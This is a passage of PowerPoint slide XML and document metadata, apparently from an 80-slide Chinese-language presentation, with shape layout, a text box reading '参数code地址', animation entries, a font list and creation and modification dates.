          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8040216" y="2363949"/>
            <a:ext cx="1440160" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="0048AA"/>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031BBC9A-2684-41F0-9D86-FBBFCF498CB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8040213" y="1985300"/>
            <a:ext cx="1486304" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>参数</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="102036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animBg="1"/>
      <p:bldP spid="7" grpId="0"/>
      <p:bldP spid="11" grpId="0" animBg="1"/>
      <p:bldP spid="18" grpId="0"/>
      <p:bldP spid="19" grpId="0"/>
      <p:bldP spid="22" grpId="0"/>
      <p:bldP spid="23" grpId="0"/>
      <p:bldP spid="25" grpId="0"/>
      <p:bldP spid="27" grpId="0"/>
      <p:bldP spid="29" grpId="0"/>
      <p:bldP spid="32" grpId="0"/>
      <p:bldP spid="35" grpId="0"/>
      <p:bldP spid="36" grpId="0"/>
      <p:bldP spid="38" grpId="0"/>
      <p:bldP spid="48" grpId="0"/>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14141</TotalTime>
  <Words>8991</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>1196</Paragraphs>
  <Slides>80</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80</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="90" baseType="lpstr">
      <vt:lpstr>等线</vt:lpstr>
      <vt:lpstr>等线 Light</vt:lpstr>
      <vt:lpstr>Microsoft Yahei</vt:lpstr>
      <vt:lpstr>Microsoft Yahei</vt:lpstr>
      <vt:lpstr>Microsoft Yahei</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Helvetica</vt:lpstr>
      <vt:lpstr>Menlo</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112</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-07-11T02:43:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-29T08:54:00Z</dcterms:modified>
</cp:coreProperties>
</file>